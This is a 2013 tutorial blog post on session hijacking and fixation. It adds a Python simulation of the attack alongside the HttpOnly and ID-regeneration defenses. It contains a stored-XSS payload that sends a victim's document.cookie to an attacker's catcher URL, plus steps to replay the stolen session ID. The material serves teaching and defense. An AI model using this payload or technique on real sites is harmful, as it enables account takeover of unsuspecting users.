Wednesday, 27 February 2013

Session Hijacking and Fixation

Session hijacking means taking over another user's session on the server, normally by obtaining that user's session identifier and presenting it as your own. Session fixation is a related weakness: when an application authenticates a user without invalidating the session identifier the user already had, an attacker who chose or learned that identifier beforehand ends up holding an authenticated session.

Combining session hijacking with session fixation gives a malicious user full access to the application as the authenticated victim.

Web applications use cookies to store temporary data on the client. Often one of these cookies holds the session ID of a logged-in user; it uniquely identifies the user to the server until they log out and the session is destroyed. Whoever presents that cookie is treated by the server as that user, which is what makes the session ID worth stealing.

The attack can be represented as follows:

For this demonstration I am using:

  • Firefox Browser ( Attacker )
  • Comodo IceDragon Browser ( Victim )
  • Tamper data ( Firefox Addon )
  • This tutorial requires a cookie stealing method. If you don't know about it, check my previous post.
"This tutorial should be used for educational purposes only. I won't be responsible if you misuse these techniques and get yourself in trouble. Performing such attacks without the permission of the owner can lead to serious trouble."

First the attacker logs in using his own credentials.

This is the information displayed about the attacker after logging in:

Now the attacker goes to a forum and injects the malicious script.

What happens at this stage is that the injected script redirects the browser to a cookie stealer script. This only works because the forum stores the post and renders it back to other users without encoding it, a stored cross-site scripting flaw. The cookie catcher script writes the cookie information it receives to a log file, and later that log file is used to extract the cookies. After injecting the code the attacker waits for the victim to log in and visit the forum.

Now the victim logs in.

This is the information displayed about the victim after logging in:

Once the victim opens the forum page, the script reads the victim's cookies, the page is redirected to the cookie catcher, and the cookie information is written to the log file.

Now the attacker copies this session ID from the log and replaces his own session ID with the hijacked one, using Tamper Data to edit the Cookie header of his request.

If the attacker now checks the information page, he will see the details of the user whose session has been hijacked. The attacker is using another user's account as an authenticated user, without ever knowing that user's password.
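The whole walkthrough above, from the injected script to replaying the stolen cookie, as an added example that is not part of the original post: an in-memory Python model of the forum application and two browsers, so it runs offline without a real forum or cookie catcher. It also runs the session fixation variant defined at the top of the post, and shows the two server-side fixes that break each attack (HttpOnly on the session cookie, and regenerating the session ID on login). The cookie name PHPSESSID, the catcher's log-line format and the victim IP address are assumptions made for the example; the post does not name them.

```python
# Added example, not the post's own code: an in-memory model of the attack chain.
import re
import secrets
from datetime import datetime

SESSION_COOKIE = "PHPSESSID"  # assumed cookie name; the post does not name it


class SessionApp:
    """Minimal cookie-session web app. `sessions` maps a session id to the
    logged-in username (None while the session is anonymous)."""

    def __init__(self, regenerate_on_login=False, httponly=False):
        self.sessions = {}
        self.regenerate_on_login = regenerate_on_login
        self.httponly = httponly

    def new_session(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = None
        return sid

    def login(self, browser, username):
        """Authenticate the browser (credentials assumed valid for the demo)
        and return the session id the browser holds afterwards."""
        sid = browser.get(SESSION_COOKIE)
        if sid not in self.sessions:
            sid = self.new_session()
        if self.regenerate_on_login:
            # Fixation fix: never carry a pre-authentication id across login.
            del self.sessions[sid]
            sid = self.new_session()
        self.sessions[sid] = username
        browser.set(SESSION_COOKIE, sid, httponly=self.httponly)
        return sid

    def whoami(self, browser):
        """The 'information displayed' page: identity bound to the cookie presented."""
        return self.sessions.get(browser.get(SESSION_COOKIE))


class Browser:
    """Cookie jar with the one attribute that matters here: HttpOnly cookies
    are still sent to the server but are invisible to document.cookie."""

    def __init__(self):
        self.jar = {}

    def set(self, name, value, httponly=False):
        self.jar[name] = (value, httponly)

    def get(self, name):
        entry = self.jar.get(name)
        return entry[0] if entry else None

    def document_cookie(self):
        return "; ".join(f"{n}={v}" for n, (v, ho) in self.jar.items() if not ho)


def xss_payload(catcher_url):
    """What the attacker posts to the forum: redirect to the catcher with the cookies."""
    return f"<script>location='{catcher_url}?c='+encodeURIComponent(document.cookie)</script>"


def catcher_log_line(victim, ip="10.0.0.7"):
    """Line the cookie catcher writes when the redirected victim arrives
    (log format and IP are constructed for this example)."""
    return f"{datetime.now():%Y-%m-%d %H:%M:%S} {ip} {victim.document_cookie()}"


def extract_session_id(log_line):
    """Pull the session id back out of the catcher's log."""
    m = re.search(rf"{SESSION_COOKIE}=([0-9a-f]{{32}})", log_line)
    return m.group(1) if m else None


def run_hijack(app):
    """Steps of the walkthrough: both users log in, the victim hits the injected
    script, the attacker replays the logged session id."""
    victim, attacker = Browser(), Browser()
    app.login(attacker, "attacker")
    app.login(victim, "victim")
    victim.set("lang", "en")  # an ordinary non-session cookie, for realism
    stolen = extract_session_id(catcher_log_line(victim))
    if stolen:
        attacker.set(SESSION_COOKIE, stolen)  # 'manipulates his existing session ID'
    return stolen, app.whoami(attacker)


def run_fixation(app):
    """Fixation: the attacker plants a known id in the victim's browser before login
    (how it is planted is assumed: a crafted link or the same XSS)."""
    victim, attacker = Browser(), Browser()
    fixed = app.new_session()
    victim.set(SESSION_COOKIE, fixed)
    app.login(victim, "victim")
    attacker.set(SESSION_COOKIE, fixed)
    return app.whoami(attacker)


if __name__ == "__main__":
    print(run_hijack(SessionApp()))                            # (stolen id, 'victim')
    print(run_hijack(SessionApp(httponly=True)))               # (None, 'attacker')
    print(run_fixation(SessionApp()))                          # 'victim'
    print(run_fixation(SessionApp(regenerate_on_login=True)))  # None
```

The two hardened configurations map to the two halves of the attack: HttpOnly keeps the session cookie out of `document.cookie`, so the catcher log never contains it, and regenerating the session ID at login means the identifier the attacker fixed is no longer bound to anything once the victim authenticates.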

Thank You